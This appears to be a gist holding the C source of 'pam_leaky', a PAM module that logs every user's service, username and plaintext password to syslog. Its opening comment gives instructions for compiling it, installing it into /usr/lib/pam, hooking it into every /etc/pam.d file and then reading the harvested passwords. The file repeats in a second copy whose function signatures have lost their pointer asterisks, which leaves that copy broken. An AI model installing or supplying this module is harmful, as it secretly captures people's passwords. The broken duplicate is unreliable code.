arirubinstein/pam_leaky.c

## pam_leaky.c
/*

  pam_leaky = get some passwordz

  Mac: compile with: ${CC} -lpam -bundle -flat_namespace -undefined suppress -o pam_leaky.so pam_leaky.c

  place .so in /usr/lib/pam

  put this at the end of everything in /etc/pam.d/ *
  auth       required       pam_leaky.so

  profit: syslog | grep leaky
*/


/* support for everythings! */
#define PAM_SM_ACCOUNT
#define PAM_SM_AUTH
#define PAM_SM_PASSWORD
#define PAM_SM_SESSION

#include <security/pam_appl.h>
#include <security/pam_modules.h>
#include <syslog.h>

int pam_sm_open_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
}

int pam_sm_close_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
}

int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
}

int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      const char *pam_user = NULL;
      const char *pam_pass = NULL;
      const char *pam_service = NULL;
      int pam_err;

      openlog("pam_leaky", 0, LOG_AUTHPRIV);

      pam_err = pam_get_item(pamh, PAM_SERVICE, (const void **)&pam_service);
      syslog(LOG_WARNING, "pam_leaky Service: %s", pam_service);

      pam_err = pam_get_user(pamh, &pam_user, NULL);
      syslog(LOG_WARNING, "pam_leaky User: %s", pam_user);

      pam_err = pam_get_item(pamh, PAM_AUTHTOK, (const void **)&pam_pass);
      syslog(LOG_WARNING, "pam_leaky Pass: %s", pam_pass);

      closelog();

      return(PAM_IGNORE);
}

int pam_sm_setcred(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
}

/* PAM entry point for authentication token (password) changes */
int pam_sm_chauthtok(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
}
	/*

	pam_leaky = get some passwordz

	Mac: compile with: ${CC} -lpam -bundle -flat_namespace -undefined suppress -o pam_leaky.so pam_leaky.c

	place .so in /usr/lib/pam

	put this at the end of everything in /etc/pam.d/ *
	auth required pam_leaky.so

	profit: syslog \| grep leaky
	*/


	/* support for everythings! */
	#define PAM_SM_ACCOUNT
	#define PAM_SM_AUTH
	#define PAM_SM_PASSWORD
	#define PAM_SM_SESSION

	#include <security/pam_appl.h>
	#include <security/pam_modules.h>
	#include <syslog.h>

	int pam_sm_open_session(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	int pam_sm_close_session(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	int pam_sm_acct_mgmt(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	int pam_sm_authenticate(pam_handle_t pamh, int flags, int argc, const char *argv) {
	const char *pam_user = NULL;
	const char *pam_pass = NULL;
	const char *pam_service = NULL;
	int pam_err;

	openlog("pam_leaky", 0, LOG_AUTHPRIV);

	pam_err = pam_get_item(pamh, PAM_SERVICE, (const void **)&pam_service);
	syslog(LOG_WARNING, "pam_leaky Service: %s", pam_service);

	pam_err = pam_get_user(pamh, &pam_user, NULL);
	syslog(LOG_WARNING, "pam_leaky User: %s", pam_user);

	pam_err = pam_get_item(pamh, PAM_AUTHTOK, (const void **)&pam_pass);
	syslog(LOG_WARNING, "pam_leaky Pass: %s", pam_pass);

	closelog();

	return(PAM_IGNORE);
	}

	int pam_sm_setcred(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	/* PAM entry point for authentication token (password) changes */
	int pam_sm_chauthtok(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}